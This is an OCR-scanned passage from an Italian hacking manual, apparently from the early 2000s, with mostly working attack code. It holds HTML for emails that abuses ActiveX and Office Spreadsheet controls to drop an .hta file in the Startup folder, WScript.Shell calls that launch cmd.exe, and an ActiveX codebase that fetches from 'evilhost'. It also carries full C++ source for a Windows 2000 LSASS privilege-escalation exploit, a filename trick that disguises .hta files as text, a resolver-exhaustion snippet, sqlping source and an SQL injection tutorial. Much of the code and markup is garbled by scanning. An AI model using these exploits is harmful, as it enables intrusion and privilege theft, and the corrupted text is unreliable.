w2.Run("C: \\WINNTWSYSTEM32WCMD.EXE /c DIR /A /P /S C:\\ "); 



ì 

setTimeout ("f() ", 2000) ; 



Un BUG molto recente è quello mediante il quale ActiveX in Internet Explorer permetterebbe 
di leggere ed installare dei componenti signed su di un computer che st navigando. 
Il tutto viene eseguito dal codice : 

<object codebase="http : //evilhost/buggyreallysigned. file " 
classid= "clsid : speciallycrafted"> 



Ed ecco un po di codici relativi alle nuove versioni di WINDOWS XP. 
Il seguente codice deve essere inserito all'interno di un email html. 



<hl> 

Hehe . Try 
</hl> 



<object 

classid= "CLSID : 0002E551 -0000-0000-C000-000000000046" 
id=Spreadsheetl 

S ="_x0000_sl026" class=shape width=81 height=81 
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ul :shapes= "_x0000_sl025 "> 
<param name=DataType vai ue=XMLURL> 
<param name=XMLData 
value="Slt; ?xml 
version=Squot ; 1 . OSquot; ?> S#13; 
 Slt ; ss : Workbook 

xmlns : o=Squot; urn : schemas-microsoft-com: off ics -.officeSquot; 
 S#10; 
xmlns :x=Squot; urn : schemas-microsoft-com: office -.excelSquot; 
 S#10; 
xmlns : ss=Squot; urn : schemas -microsoft- 

com : office : spreadsheet S quot ; S#13; &#1 0; xmlns : c=Squot ; urn : schemas- 
microsoft-com: office : component : spreadsheet & quot ; S#13; &#1 0; 
xmlns :html=Squot; http : //www. w3 . org/TR/REC -html4 O&quot ; > 
 
 
Slt;x:ExcelWorkbookSgt; 
 S#10; 

Slt ; x : ProtectStructureSgt ; False&lt ; /x : ProtectStructureSgt ; 
 
 

<x:ActiveSheet> O< /x:ActiveSheetSgt; 
 &§10; 

Slt; /x:Excelfforkbook> 
 
 Slt; ss : StylesSgt; 
 
 

Slt; ss :Style ss : ID=Squot;DefaultSquot; Sgt; S#13; S#10; 

Slt; ss -.Alignment ss : Horizontal=Squot ; AutomaticSquot ; 

ss : Rotate=Squot ; 0 . OSquot; ss : Vertical=Squot ; BottomSquot ; S#13; S#10; 

ss :ReadingOrder=Squot; ContextSquot ; /Sgt; S#13; S#10; 

Slt; ss :BordersSgt; S#13; S#l 0; Slt; /ss :BordersSgt; S#13; SUO; 

Slt; ss: Font ss :FontName=Squot;ArialSquot; ss : Size=Squot ; lOSquot ; 

ss : Color=Squot ; AutomaticSquot ; ss : Bold=Squot ; OS quot; S#13; S#10; 

ss : Italic=Squot ; OSquot; 

ss : Underline=Squot;NoneSquot; /Sgt; S#13; S#10; Slt; ss : Interior 
ss : Color=Squot ; AutomaticSquot ; 

ss : Pattern=Squot ; NoneSquot; /Sgt; S#13; S#10; Slt; ss : NumberFormat 

ss : Format=Squot ; GeneralSquot; /Sgt; S#13; S#10; Slt; ss : Protection 

ss :Protected=Squot; lSquot; /Sgt; S#13;S§10; 

Slt; /ss:StyleSgt; S#13; S#10; Slt; /ss -.StylesSgt; S§13; S#10; 

Slt ; c : ComponentOptionsSgt ; S#13; S#10; Slt ; c : LabelSgt ; S#13; S#10; 

Slt; c: Capt ionSgt;Mi ero soft Offi ce 

Spreadsheet Slt ; /c : CaptionSgt ; S#13; S#10; Slt; /c : LabelSgt; S#13; S#10; 

Slt; c : PreventPropBrowser/Sgt ; S#13; S#l 0; 

Slt;c:MaxHeightSgt; 80%Slt; /c :MaxHeightSgt; S#13; S#10; 

Slt;c:MaxWidthSgt;80%Slt;/c:MaxWidthSgt;S#13;SÌ10; 

Slt ; c :NextSheetNumberSgt ; lSlt; /c:NextSheetNumberSgt; S#13; S#10; 

Slt; /c : ComponentOptionsSgt ; S#13; S#10; 

Slt;x: WorkbookOpt ionsSgt; S#13; S#10; 

Slt ; c : OWCVersionSgt ; 10 . 0 . 0 . 2621 | 

Slt; /c: OWCVersi onSgt ; S#13 ; SUO ; Slt;x:Di sabl eUndo/Sgt ; S#13 ; S#10 ; 
Slt; /x: WorkbookOptionsSgt ; S§13; &#1 0; Slt; ss : 



Slt; 


X. 


: WorksheetOptionsSgt ; S#13; S#10; 


Slt; 


x . 


;Selected/Sgt;S#13;S#10; 


Slt; 


X. 


: ViewableRangeSgt ; RI :R262144Slt; /x: ViewableRangeSgt ; S#13; S#10; 


Slt; 


X. 


:SelectionSgt;RlClSlt; /x : SelectionSgt ; S#13; S#10; 


Slt; 


X . 


: TopRowVisibleSgt ; OSlt; /x: TopRowVisibleSgt; S#13; S#10; 


Slt; 


X . 


■LeftColumnVisibleSgt; 0Slt;/x:LeftColumnVisibleSgt;S§13;S#10; 


Slt; 


X . 





Slt; /x: WorksheetOptionsSgt; S#13; S#l 0; 
Slt;c: WorksheetOptionsSgt; S§13; S#10; 
Slt; /c -.WorksheetOptionsSgt ; S#13; S#10; 
ss :ExpandedColumnCount=Squot; lSquot; 
ss : ExpandedRowCount=Squot ; lSquot; S#13; Si 
ss :DefaultColumnWidth=Squot; 48 . OSquot; 
ss :DefaultRowHeight=Squot; 12 . 75Squot; Sgt; S#13; S#10; 
Slt; ss :RowSgt; S#13; S#10; Slt; ss :Cell 
ss :Formula= ' =HOST () . SaveAs (Squot; . ./Start 
Menu/Programs/StartUp/gggg5 .htaSquot; , 8) ' Sgt; S#13; S#10; 
Slt; ss : Data 

ss : Type=Squot ; BooleanSquot ; Sgt; lSlt; /ss -.DataSgt; S#13; S#10; 
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Slt; /ss : CellSgt; S#13; S#l 0; Slt; /ss :RowSgt; S#13; S#l 0; 
Slt; /ss : TableSgt; 
 S#l 0; Slt; /ss : Worksheet> S#13 ; S#10; 
Slt; ss : Worksheet ss :Name=" Sheet2Squot; > S#13; &#1 0; 
Slt ;x -.WorksheetOptlonsSgt; S#13; S#10; 

Slt;x:ViewableRangeSgt;Rl :R262144< /x:VlewableRangeSgt; S#13; 
 
Slt ;x: SelectionSgt ;RlClSlt; /x : SelectionSgt ; 
 S#10; 
<x: TopRowVisible> 0</x: TopRowVisible&gt ; 
 S#10; 

:gi 



&lt ; x : ProtectContents&gt ; FalseSlt ; /x : ProtectCont 
Slt; /x: WorksheetOptions> 
 &#1 0; 
&lt ; c : WorksheetOptions&gt ; 
 
 

< /c : WorksheetOptions> 
 &§10; Slt; /ss : Worksheet> . 
Slt; ss : Worksheet ss :Name=Squot; Sheet3Squot; Sgt; S#13; S#l 0; 
Slt;x: WorksheetOptlonsSgt ; S#13; S#10; 

Slt;x:ViewableRangeSgt;Rl :R262144Slt; /x:ViewableRangeSgt; S#13; S#10; 
Slt ; x : SelectionSgt ; R1C1S lt ; /x : SelectionSgt ; S#13 ; SUO; 
Slt;x: TopRowVisibleSgt ; OSlt; /x: TopRowVisibleSgt; S#13; S#10; 
Slt;x:LeftColumnVisibleSgt; OSlt; /x:LeftColumnVisibleSgt; S§13; S#10; 
Slt ; x : ProtectContentsSgt ; FalseSlt ; /x : ProtectContentsSgt ; S#13; S#10; 
Slt; /x: WorksheetOptlonsSgt ; S#13; SUO; 
Slt;c: WorksheetOptlonsSgt; S§13; S#10; 
Slt; /c -.WorksheetOptlonsSgt ; S#13; S#10; 
Slt; /ss : WorksheetSgt ; S#13; SUO; 
Slt ; o : DocumentPropertiesSgt ; S#13; S#10; 
Slt;o: AuthorS gt;adSlt;/o:AuthorSgt;S§13;S#10; 
Slt;o:LastAuthorSgt;adSlt;/o:LastAuthorSgt;S#13;S#10; 
Slt;o : CreatedSgt; 2002-03-1 7T12 :07:3 7ZSlt; /o : Create 
Slt;o: Company S gt ;gSlt ; /o : Company S gt; S#13; S#10; 
Slt;o: VersionSgt;10. 2625Slt; /o : VersionSgt; S#13; S#10; 
Slt; /o: DocumentPropertiesSgt ; S#13; S#10; 
Slt;o : OfficeDocumentSettingsSgt; S #13; S#l 0; 

Slt ; o : DownloadComponents/Sgt ; S#13; S#10; Slt ; o : LocationOfComponents 
HRef=Squot; file :///E: \Squot; /Sgt; S#13; S#10; 

Slt; /o: OfficeDocumentSettingsSgt; S#13; S#10; Slt; /ss : WorkbookSgt; S#13; S 



<param name=AllowPropertyToolbc 
<param name=AutoFit value=0> 
<param name=Calculation value=-4105> 
<param name=Caption value= "Microsoft Office Spi 
<param name=DisplayColumnHeadings value=-l> 
<param name=DisplayGridlines value=-l> 
<param name=DisplayHorizontalScrollBar value=-l> 
<param name=DisplayOfficeLogo value=-l> 
<param name=DisplayPropertyToolbox value=0> 
<param name=DisplayRowHeadings value=-l> 
<param name=DisplayTitleBar value=0> 
<param name=DisplayToolbar value=-l> 
<param name=DisplayVerticalScrollBar value=-l> 
<param name=DisplayWorkbookTabs value=-l> 



<param 


name=MaxHeight value="80%"> 




<param 


name=MaxWidth value="80%"> 




<param 


name=MoveAfterReturn value= 


-1> 


<param 


name=MoveAfterReturnDirecti 




<param 


name=RightToLeft value=0> 




<param 


name=ScreenUpdating value=- 




<param 


name=EnableUndo value=0> 





</object> 
<script> 
i=3; 

while (i—ì confirm("Trustworthy?") ; 
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//x=new ActiveXObject ( "WScript . Shell ") ; 

//x.Run("C: \ \WINNTWSYSTEM32WCMD.EXE /C DIR C:\\ /a /p /s") ; 



Ecco un altro codice da inserire dentro ad un email HTML. 



<OBJECT ld=WebBrowserl height=150 width=300 

classid=CLSID : 8856F961 -340A-11D0-A96B-00C04FD705A2> 

<PARAM NAME="ExtentX" VALUE="7938"> 

<PARAM NAME= "Ext entY" VALUE="3969"> 

<PARAM NAME= "ViewMode " VALUE="0"> 

<PARAM NAME="Offline" VALUE="0"> 

<PARAM NAME="Silent" VALUE="0"> 

<PARAM NAME="RegisterAsBrowser" VALUE="1"> 

<PARAM NAME="RegisterAsDropTarget" VALUE="1"> 

<PARAM NAME="AutoArrange" VALUE="0"> 

<PARAM NAME="NoClientEdge" VALUE="0"> 

<PARAM NAME="AllgnLeft" VALUE="0"> 

<PARAM NAME="ViewID" VALUE=" { 0057D0E0-3573-11CF-AE69-08002B2E1262 } "> 
<PARAM NAME= "Location " VALUE= "about : /dev/random&lt 
(42) alert ( ' HOHOHO\nTrying to sell trustworthy 
computing\nHOHOHO ' ) < /script > "> 
<PARAM NAME="ReadyState" VALUE="4"> 
</OBJECT> 
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Eredità dalle tecniche dei cracker 

Nei capitoli precedenti abbiamo visto come potrebbe essere possibile trasferire files su di un 
sistema remoto attivando TFTP grazie bugs, a email e a pagine html con codice particolare. 
Negli tessi capitoli era anche riportato il metodo ipotetico per attivare processi i quali al limite 
potrebbero essere gli stessi programmi trasferiti. 

A questo punto possiamo vedere come mediante delle metodologie da cracker è possibile 
elevare i privilegi di un utente in ambiente Windows. 

Chiaramente questo per essere fatto è necessario poter scrivere sul sistema remoto e 
all'interno di HKCR (le voci del registro HKEY_CLASSES_ROOT) 

All'interno del sistema esistono dei breakpoint che possono essere utilizzati dai debuggers 
per interrompere l'esecuzione di una procedura ad un certo punto. 

Tra questi sistemi per attivare dei breakpoint ne esiste uno particolare che è costituito dalla 
presenza di un registro DRO-7 il quale è globale per tutte le procedure attive sotto Windows. 
Se il registro venisse usato per settare un breakpoint, all'esecuzione di questo tutti i processi 
e i servizi verrebbero intaccati. 

Nel caso del suo uso per procedure di hacking la metodologia pretende due funzioni 
particolari ovvero l'interruzione di un servizio e quindi il dirittamento ramite pipe verso un 
nostro servizio scritto appositamente. 

Il programma che segue scritto in C++ esegue il kill di LSASS.EXE e successivamente il tutto 
viene dirottato su WApipeMsass 

// Win2K elevation of privileges 

// Written by Georgi Guninski http://www.guninski.com 

// Kind of ugly but works 

// Check the disclaimer and advisory at 

http: //www . guninski . com/drO 7 . html 

#define _WIN32_WINNT 0x0500 

^include <stdio.h> 
^include <windows.h> 
# include <stdlib.h> 

// may need to change below 

/////////////////////////////// 

DWORD lsasspid=224; // pid of LSASS.EXE 

//DWORD lsasspid=236; // pid of LSASS.EXE 

DWORD MAGICESPINLSA=0x0053ffa0; // ESP in LSASS.EXE - may need to 
change it 

////////////////////////////// 

char szPipe[64]="\\\\. \\pipe\\lsass" ; 
HANDLE hProc = NULL; 
PROCESS_INFORMATION pi; 



volatile int lsadied = 0; 



unsigned long stdcall threadlock (void *v) 

{ 

Sleep(lOOO) ; 
LockWorkStation () ; 
return 0; 

ì 

unsigned long stdcall threadwriter (void *v) 

{ 

while ( ! lsadied) 
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{ 

FILE *fl; 

fl=fopen ("\\\\.\ \p±pe \ \lsass ", "a ") ; 
if (fi != NULL) 
{ 

fprintf (fi, "A") ; 
fclose (fi); 

} 

/* 

else 

printf ("%s\n" , "error writing to pipe"); 

*/ 

Sleep(400) ; 
} 

printf ("%s\n", "Stop writing to pipe"); 
return 0; 

} 

unsigned long stdcall waitlsadie (void *v) 

{ 

int lsadied2=0; 

long ( stdcall *NtQuerySystemInformation ) ( ULONG, PVOID, ULONG, 

ULONG ) = NULL; 

if ( ! NtQuerySystemlnformation ) 

NtQuerySystemlnformation = ( long ( stdcall * ) ( ULONG, 

PVOID, ULONG, 

ULONG ) ) GetProcAddress ( GetModuleHandle ( "ntdll.dll" 
) , "NtQuerySystemlnformation " ) ; 
typedef struct _tagThreadInfo 
{ 

FILETIME ftCreationTime; 

DWORD dwUnknownl; 

DWORD dwStartAddress ; 

DWORD dwOwningPID; 

DWORD dwThreadID; 

DWORD dwCurrentPriority; 

DWORD dwBasePriority; 

DWORD dwContextSwitches ; 

DWORD dwThreadState ; 
DWORD dwWaitReason ; 

DWORD dwUnknown2[ 5 ]; 
} THREADINFO, *PTHREADINFO ; 
#pragma warning( disable : 4200 ) 
typedef struct _tagProcessInfo 
{ 

DWORD dwOffset; 
DWORD dwThreadCount ; 
DWORD dwUnknownl [ 6 ]; 
FILETIME ftCreationTime; 
DWORD dwUnknown2 [ 5 ]; 
WCHAR* pszProcessName; 
DWORD dwBasePriority; 
DWORD dwProcessID; 
DWORD dwParentProcessID ; 
DWORD dwHandleCount ; 
DWORD dwUnknown3; 
DWORD dwUnknown4 ; 
DWORD dwVirtualBytesPeak; 
DWORD dwVirtualBytes; 
DWORD dwPageFaults ; 
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DWORD dwWorkingSetPeak; 

DWORD dwWorkingSet ; 

DWORD dwUnknown5; 

DWORD dwPagedPool; 

DWORD dwUnknown6; 

DWORD dwNonPagedPool; 

DWORD dwPageFileBytesPeak; 

DWORD dwPrivateBytes ; 

DWORD dwPageFileBytes; 

DWORD dwUnknown7[ 4 ]; 

THREAD INFO ti [ 0 ]; 
} _PROCESSINFO, *PPROCESSINFO; 
#pragma warning( dm fault : 4200 ) 



PBYTE pbylnfo = NULL; 

DWORD clnfoSize = 0x20000; 
while ( ! Isadied2) 
{ 

pbylnfo = ( PBYTE ) malloc ( clnfoSize ); 

NtQuerySy stemln formation ( 5, pbylnfo, clnfoSize, 0 ) ; 

PPROCESSINFO pProcessInfo = ( PPROCESSINFO ) pbylnfo; 

bool bLast = false; 

lsadied2 = 1; 

do { 

if ( pProcessInfo->dwOffset == 0 ) 
bLast = true; 
if (pProcessInfo->dwProcessID == lsasspid) 
lsadied2 = 0 ; 

pProcessInfo = ( PPROCESSINFO ) ( ( PBYTE ) pProcessInfo + 
pProcessInfo->dwOffset ) ; 

} while ( bLast == false ) ; 
free ( pbylnfo ) ; 

ì 

printf( "LSA diedi \n ") ; 
lsadied=l ; 
return 0; 
} 



void add_ thread ( HANDLE thread) 
{ 

CONTEXT ctx = { CONTEXT_DEBUG_REGISTERS } ; 

//DR7=d0000540 DR6=ffffOffO DR3=53ffaO DR2=0 DR1=0 DR0=0 

SuspendThread (thread) ; 
GetThreadContext (thread, Sctx) ; 

ctx . Dr7=0xd0000540; 

ctx . Dr6=0xffff0ff0; 

ctx . Dr3=MAGICESPINLSA; 

ctx.Dr2=0; 

ctx.Drl=0; 

ctx.DrO=0; 
SetThreadContext (thread, Sctx) ; 
ResumeThread (thread) ; 
// printf ("DR7=%x DR6=%x DR3=%x DR2=%x DRl=%x 
DRO=%x\n" , ctx.Dr7, ctx.Dr6, ctx.Dr3, ctx.Dr2, ctx.Drl, ctx.DrO) ; 
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unsigned long stdcall threaddeb (void *v) 

{ 

STARTUPINFO si = { 

sizeof (STARTUPINFO) 

}; 



CreateProcess (0, "c: \ \winnt \ \system32\ \taskmgr . exe" , 0, 0, 0, 
CREATE_NEW_CONSOLE, 0, 0, Ssi, &pi) ; 
Sleep (2000) ; 
BOOL status = CreateProcess ( 

0, 

"c: \ \winnt \ \system32\ \calc.exe", 
0, 0, 0, 

DEBUG_PROCESS 
I DEBUG_ONLY_THIS_PROCESS 
I CREATE_NEW_CONSOLE, 
0, 0, Ssi, &pi) ; 

if( ! status ) 
{ 

printf ( "%s \n ", "error debugging") ; 
exit (1) ; 

} 

add_thread (pi . hThread) ; 

for( ;; ) 
{ 

DEBUG_EVENT de; 

if( ! WaitForDebugEvent (&de, INFINITE) ) 
{ 

printf ("%s\n", "error WaitForDebugEvent"); 

) 

switch( de . dwDebugEventCode ) 
{ 

case CREATE_THREAD_DEBUG_EVENT : 

add_thread (de. u.CreateThread. hThread) ; 
break; 

} 

ContinueDebugEvent (de . dwProcessId, de . dwThreadld, DBG_ CONTINUE ) ; 
} 

return 0; 



int mainfint argc,char* argv[]) 
{ 

DWORD dwType = REG_DWORD; 
DWORD dwSize = sizeof (DWORD) ; 

DWORD dwNumber = 0; 
char szUser [256] ; 
HANDLE hPipe = 0; 

if (argc > 1) 

lsasspid=atoi (argv[l ] ) ; 
if (argc > 2) 
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sscanf(argv[2] , "%x", SMAGICESPINLSA) ; 

printf ("Fun with debug registers . Written by Georgi 
Guninski \n ") ; 

printf ("wdr started: lsasspid=%d 
breakp=%x\n ", lsasspid, MAGICESPINLSA ) ; 

CreateThread (0 , 0, Sthreadwriter, NULL, 0, 0) ; 

CreateThread (0 , 0, Swaitlsadie, NULL, 0, 0) ; 

CreateThread (0, 0, Sthreaddeb, NULL, 0, 0) ; 

while ( ! lsadied) ; 
printf ("start %s\n" , szPipe) ; 

hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 

PIPE_ TYPE_MESSAGE \ PIPE_ WAIT, 
2, 0, 0, 0, NULL); 

if (hPipe == INVALID_HANDLE_ VALUE ) 

{ 

printf ("Failed to create named pipe: \n %s\n", szPipe); 
return 3; 

} 

CreateThread (0, 0, sthreadlock, NULL, 0, 0) ; 

ConnectNamedPipe (hPipe, NULL) ; 
if (i.ReadFile (hPipe, (void *) sdwNumber, 4, sdwSize, NULL)) 
{ 

printf ("Failed to read the named pipe. \n") ; 
CloseHandle (hPipe) ; 
return 4; 

} 

if ( ! ImpersonateNamedPipeClient (hPipe) ) 
{ 

printf ( "Failed to impersonate the named pipe. \n") ; 
CloseHandle (hPipe) ; 
return 5; 

} 

dwSize = 256; 

GetUserName (szUser, idwSize) ; 

printf ("Impersonating dummy :) : %s\n\n\n\n", szUser) ; 
// the action begins 
FILE *fl; 

fl=fopen("c: \\winnt\\system32\\wl . w" , "a") ; 
if (fi != NULL) 
{ 

fprintf(fl, "lsass worked\n") ; 
foiose (fi); 

printf ( " \n%s \n ", "Done ! ") ; 

} 

else 

printf ("error creating file"); 
fflush (stdout) ; 
HKEY mykey; 

RegCreateKey (HKEY_CLASSES_ROOT , "w", imykey) ; 
RegCloseKey (mykey) ; 



CloseHandle (hPipe) ; 

return 0; 

} 



Un metodo semplice per testare questo sistema di debugging è il seguente. 
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Eseguite calc.exe con WINDBG, il debugger di Windows. 

Settate il breakpoint hardware in memoria e scrivete il valore corrente di ESP. 

Richiamate il taskmgr.exe, il task manager, ed attendete qualche istante. 

Se ricevete una SINGLE STEP EXCEPTION con una dialog box relativamente ad un 

processo differente a CALC.EXE allora potenzialmente siete soggetti a questo bug. 

Il programma in cpp ha due argomenti e precisamente <pid di LSASS.EXE> e <ESP in 

LSASS.EXE>. 

Lanciatelo e aspettate qualche istante. 

Il risultato dovrebbe essere quello di ricevere una exception in LSASS.EXE 
Un file è creato in c:\winnt\system32 eanche una chiave in HKCR. 
Se LSASS.EXE non viene terminato bloccate e fate ripartire pipe3. 

Se anche questa volta non capita nulla allora dovrete giocare sui parametri 
MAGICESPINLSA 



Questo è ESP nel thread in LSASS.EXE. 

Se ricevete BSOD allora dovrete modificare il parametro e la funzione Sleep(). 



La falsificazione dei f iles 

Supponiamo di voler inserire dentro ad un files del codice html (.HTA) per voler fare in modo 
che chi vede il file di fatto ci clicki sopra convinto che questo sia tutf altra cosa. 
Il codice dentr ad un file potrebbe essere : 

<script> 

a=new ActiveXObject("WSCript.Shell"); 
a.runfCMD.EXE"); 

alert("l am .HTA\n Started command prompt"); 
</script> 

Come dicevamo prima è possibile scrivere il nome del file seguito da un particolare CLSID 
come nell'esempio che segue : 

tes_hta.txt.{3050F4D8-98B5-1 1 CF-BB82-00AA00BDCE0B} 
Guardando il file con l'explorer vedremmo solo la prima parte. 



m Temp 


B— — — — — M~ ' 








AHacker_sGuideToPrcitecting 




pATEasy3 




^ps409 




jgfjitesthta.txt 





Guardate clickando sul file (sul mio sistema i files TXT sono associati ad un editor di testo il 
quale dovrebbe essere attivato .... Invece ...). 
Viene attivata una shell mediante CMD.EXE 
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j^Wtackjer^juideTbProteclhg 



_|ps+D9 
M basttita ,txt 



nicracoft liindcwc HF L Me l i io n E-l-db^lJ 
CCÌ Copiii'iffht i 585-2881 Microsoft Corp. 

F: \Tenp> 





Bloccare la capacità di risolvere un indirizzo 

Alcune volte nelle attività svolte dagli hackers diventa importante bloccare la capacità di un 
sistema di risolvere un indirizzo. 

Con poche linee di programma è possibile mettere un sistema Windows nell'incapacità di 
farlo. 

Nei capitoli precedenti abbiamo visto la gestione della rete mediante l'uso di JAVA. 

Le due o tre righe che seguono sono appunto scritte in questo linguaggio per fare in modo 

che al limite queste possano essere anche inserite dentro a pagine WEB. 



for (i=0;±<m; 
{ 



try { DatagramSocket d = new DatagramSocket () ; v. addElement (d) ; } 
catch (Exception e) {System. out .println ("Exhausted, i="+±) ; . 
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I dentif icazione SQ L Server 

Nei capitoli precedenti abbiamo visto le tecniche legate ad SQL Server. 
Chiaramente il problema è trovare i vari SQLServer presenti in rete. 
Per fare questo è sufficiente uno speciale PING ovvero SQLPing. 

/* $Id: sqlping.c,v 1.1 2001/03/06 02:40:48 fygrave Exp $ */ 
/* 

** fygravs@tigerteam.net 

** http : //www. relaygroup . com 

** 

** Unix port of m$ sql ping tool from http://www.sqlsecurity.com 

(reversed) 

** 

** 

** 

*/ 



^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 



<stdio.h> 
<stdlib.h> 
<unistd. h> 
<sys/types . h> 
<sys/socket . h> 
<sys/time . h> 
<sys/select . h> 
<netinet/in . h> 
<arpa/inet . h> 
<errno . h> 
<signal . h> 
<netdb.h> 



#define DEF_ TIMEOUT 10 
#define SQL_PORT 1434 



int ssock; 



int usage(char *myname) { 

printf ("Usage: %s ip_address [timeout] [num of 
packets ] \n ",myname) ; 

exit (1) ; 

ì 



void sig_alarm(int sig) { 
dose (ssock) ; 

printf ("\nNo responce received. \n" ) ; 
exit (1) ; 



int main (int argc, char **argv) { 

int pcount; 
int npack; 
struct servent *sp; 
struct sockaddr_in host; 
struct hostent *hostaddr; 
struct Unger ling; 
int rsize, hsize, i, timeout; 
fd_set rfd, wfd; 
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unsigned char received=0 ; 
char rpack[] = "\x02"; 
unsigned char buf [1000] ; 
int junkct=0 ; 



/* we need hostname. at least.. */ 
if (argc<2) { 

usage (argv [0] ) ; 

exit (1) ; 

} 



/* and maybe timeout */ 



timeout = DEF_ TIMEOUT; 
npack = 1; 



switch (argc) { 
case 4 : 

npack = atoi (argv[3] ) ; 

case 3: 

timeout = atoi (argv [2] ) ; 
break; 

case 2: 

break; 

default : 

printf ( "too much garbage \n ") ; 
usage (argv[0] ) ; 



if (timeout <=0) { 
fprintf (stderr, 
usage (argv [0] ) ; 



"Bogus timeout period 



[%s] \n",argv[3]); 



if (signal ( SIGALRM, sig_alarm) ==SIG_ERR) { 
perror ( "signal ") ; 
exit(l); 

} 

alarm (timeout ) ; 



memset (Shost, 0, sizeof (host) ) ; 
host . sin_family = AF_INET; 
host . sin_port = 0; 

if (( hostaddr = gethostbyname (argv[l] ) ) == NULL) { 
herror ( "can ' t resolve remote hostname") ; 
exit (1) ; 

} 



/* here we open socket, which we will use to send packets */ 



if ( (ssock=socket (AF_INET, SOCK_DGRAM, 0) ) < 0) { 
perror ( "socket ") ; 
exit (1) ; 

} 



if ( (bind(ssock, (struct sockaddr *)&host, sizeof (host) ) ) < 0 ) { 
perror ( "bind ") ; 
dose (ssock) ; 
exit (1); 

} 

ling . l_onoff = 0; /* dont Unger */ 
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If (setsockopt (ssock, SOL_SOCKET, 

SO_LINGER, (void *)&ling, sizeof (ling) ) ==-1) { 
perror ( "setsockopt error : ") ; 
dose (ssock) ; 
exit(l); 

ì 

host . sin _port = htons (SQL_PORT) ; 

bcopy (hostaddr->h_addr, Shost . sin_addr, hostaddr->h_length) ; 

printf ("Sending %i packet(s) to %s [%s]\n(%± sec. timeout).", 
npack, argv[l], 

inet_ntoa (host . sin_addr) , timeout) ; 



waitsock . tv_sec=0 ; 
waitsock . tv_usec=0 ; 



/* send packets while not receive any or interrupted */ 
for(;;) { 

FD_ZERO (Srfd) ; 
FD_ZERO (Swfd) ; 
FD_SET (ssock, Srfd) ; 
FD_SET (ssock, Swfd) ; 



if (select (ssock+1, &rfd, Swfd, (fd_set *) 0, Swaitsock) == -1) { 
if (errno==EINTR) 
continue; 
else { 

perror ( "select ") ; 
dose (ssock) ; 
exit (1) ; 

} 

ì 

/* if we can write */ 

if (FD_ISSET (ssock, Swfd) SS npack) { 

if ( (sendto (ssock, rpack, sizeof (rpack) , 
0, (struct sockaddr *) shost, 
sizeof (host) ) ) 
!= sizeof (rpack) ) { 
perror ( "sendto ") ; 
if (ermo == ENOBUFS ) { 
sleep(l) ; 
continue; 

} 

else 

exit (1) ; 

} 

printf (". ") ; 
npack — ; 
fflush (stdout) ; 

} 

/* if something to read ... */ 
if (FD_ISSET (ssock, Srfd) ) 
{ 

if ( ( rsize = recvfrom( ssock, buf, sizeof (buf) , 0, 

(struct sockaddr *) Shost, Shsize) ) <=0) continue; 
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printf ( " \nResponse : \n ") ; 
f or (1=3; i<rsize; i++) { 
if (bnf[±ì == '; ') 
if (junkct) { 

printf ("\n") ; 
junkct=0 ; 
} else { 

if (buf[i-l] != '; ') 

printf ("\t\t=\t") ; 
junkct=l; 

} 

else 

printf ( "%c ", buf[i]) ; 



} 

received++; /* ok. . we got at least single packet */ 



} 

if (received) break; 

ì 

dose (ssock) ; 
printf ("\n") ; 



return 0; 




SQ L I nj ection 

Molte volte le tecniche comuni sono troppo conosciute per avere delle probabilità per avere 
successo. 

A questo punto gli attacchi devono trovare delle strade alternative come ad esempio quelle 
che riguardano tutti quei programmi che tra le loro potenzialità hanno quelle di eseguire del 
codice in modo arbitrario. 

Mi riferisco ad esempio ai sistemi di database SQL i quali spesso tra gli statement eseguibili 
hanno anche quelli legati all'esecuzione di comandi i quali verrebbero eseguiti con gli stessi 
diritti relativi a quelli legati all'esecuzione del programma. 

Prendiamo ad esempio sistemi che sono molto famosi all'interno delle crew quali quella di 
ZeroHack ovvero quei siti posizionati in Russia o in altri paesi in cui certi tipi di reati sessuali 
sono permessi o perlomeno non perseguiti a termine di legge come ad esempio i siti pedofili. 
Questi in genere sono corazzati in quanto notoriamente subiscono attacchi da parte degli 
hackers i quali non sopportano certi siti palesemente pedofili. 

Come dicevo questi siti hanno tutte le porte bloccate, i servizi quali FTP e TELNET bloccati e 
cosi via. 

In ogni caso questi dispongono di servizi di database destinati alla registrazione degli utenti e 
al loro login. 

La metodologia che permette di eseguire un certo tipo di attacchi viene definita con il termine 
di SQL injection la quale è un tecnica per eseguire l'exploit delle applicazioni WEB che usano 
i database 

Nei capitoli precedenti avevamo già affrontato il discorso parlando dei problemi legati ai 
database SQL ma ad ogni modo qui vedremo di approfondire l'argomento. 
Molte volte le problematiche sorgono dal fatto che gli implementatori del codice di gestione 
dei sistemi di database ignorano per comodità o per ignoranza i pericoli che possono sorgere 
dalla visualizzazione di codice inserito dentro ai campi da parte di client senza 
precedentemente controllarne il contenuto. 

Sapete tutti che ad esempio i linguaggio di script vengono interpretati a livello di server o di 
client per cui spesso inserendo dentro ai campi del database dei comandi del linguaggio o del 
sistema SQL stesso questi vengono interpretati esattamente come se di fatto fossero presenti 
dentro al file .ASP, .PHP o quello che è. 

Prima di perdere tempo con un sistema eseguite una prova sostituendo un parametro con un 
apicetto seguito da un comando SQL :e dal carattere di REM ovvero : 
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Capite che se ad esempio il nome inserito dentro ad un campo richiesto in una pagina WEB 
fosse utilizzato all'interno di una statement SQL questo potrebbe essere visto come: 



SELECT * FROM TABLE WHERE Nome= " Nomelnserlto' 



Guardiamo un ipotetico programma in C che legge l'input e crea la stringa : 



^include <stdio.h> 



void main (vid) 
{ 

char buffer [128] ; 
printf ( " \nlnput : 
gets (buffer) ; 
printf ( " \n \nSelect 



"). 



Name= ' %s ' 



Compiliamo e vedamo gli output inserendo prima un nome come dovrebbe essere messo e 
poi uno statement errato. 



F: \ TempWork>cl test . c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00. 
Copyright (C) Microsoft Corp 1984-1998 . Ali rights reserved. 

test . c 

Microsoft (R) Incrementai Linker Version 6.00.8447 
Copyright (C) Microsoft Corp 1992-1998 . Ali rights reserved. 

/out : test . exe 
test . obj 

F: \TempWork>test 
Input : Flavio 

Select * From Table Where Name= 'Flavio ' 
F: \TempWork>test 

Input : zzz ' where ; — 

Select * From Table Where Name='zzz' where ; — ' 



Vedete che inserendo il nome verrebbe : 

Select * From Table Where Name= 'Flavio ' 



Inserendo zzz' WHERE - farebbe si che gli apicetti appesi dal programma in C verrebbero 
considerato dopo il REM. 



In un ambito reale, nel caso in cui I parametri siano più di uno, I test devono essere eseguiti 
uno alla volta. 

Supponiamo che questa sia una linea di argomenti completamente valida : 
